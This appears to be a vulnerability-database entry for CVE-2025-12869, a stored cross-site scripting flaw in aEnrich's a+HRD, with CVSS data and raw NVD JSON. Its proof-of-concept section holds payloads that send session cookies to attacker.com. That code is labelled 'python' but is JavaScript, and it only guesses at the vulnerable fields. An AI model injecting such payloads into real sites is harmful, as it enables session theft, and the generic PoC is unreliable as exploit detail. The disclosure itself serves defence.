CVE-2025-12869

Description

The a+HRD developed by aEnrich has a Stored Cross-Site Scripting vulnerability, allowing remote attackers with administrator privileges to inject persistent JavaScript codes that are executed in users' browsers upon page load.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aenrich:a\+hrd:*:*:*:*:*:*:*:* - VULNERABLE

a+HRD (aEnrich) - 版本未知

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-12869 Stored XSS PoC for a+HRD
// This PoC demonstrates the stored XSS vulnerability in a+HRD
// Note: This is for educational and authorized testing purposes only

// Malicious payload that could be injected via administrator panel
const xssPayload = '<script>\n'
    + '  // Steal session cookies\n'
    + '  fetch("https://attacker.com/steal?cookie=" + encodeURIComponent(document.cookie));\n'
    + '  // Alternative payload using img tag for bypass\n'
    + '</script>\n'
    + '<img src=x onerror="fetch(\'https://attacker.com/steal?data=\'+document.cookie)">\n'
    + '<svg onload="alert(document.domain)">';

// Example attack scenario:
// 1. Attacker with admin privileges accesses a+HRD admin panel
// 2. Navigates to a field vulnerable to XSS (e.g., employee name, department, job title)
// 3. Submits the XSS payload instead of legitimate data
// 4. Payload is stored in database without sanitization
// 5. When other users view the affected page, the script executes in their browser

console.log('PoC Payload:', xssPayload);
console.log('Target: a+HRD by aEnrich');
console.log('Vulnerability: Stored XSS');
console.log('CVSS: 4.8 (Medium)');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12869
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12869
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12869/
[4] VulDB https://vuldb.com/cve/CVE-2025-12869
[5] https://www.twcert.org.tw/en/cp-139-10487-12a32-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10486-a3459-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12869", "sourceIdentifier": "[email protected]", "published": "2025-11-12T08:15:41.290", "lastModified": "2025-11-18T19:30:29.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The a+HRD developed by aEnrich has a Stored Cross-Site Scripting vulnerability, allowing remote attackers with administrator privileges to inject persistent JavaScript codes that are executed in users' browsers upon page load."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aenrich:a\\+hrd:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.5", "matchCriteriaId": "AFE95A54-8084-4126-A1B7-9B89828066C0"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10487-12a32-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10486-a3459-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}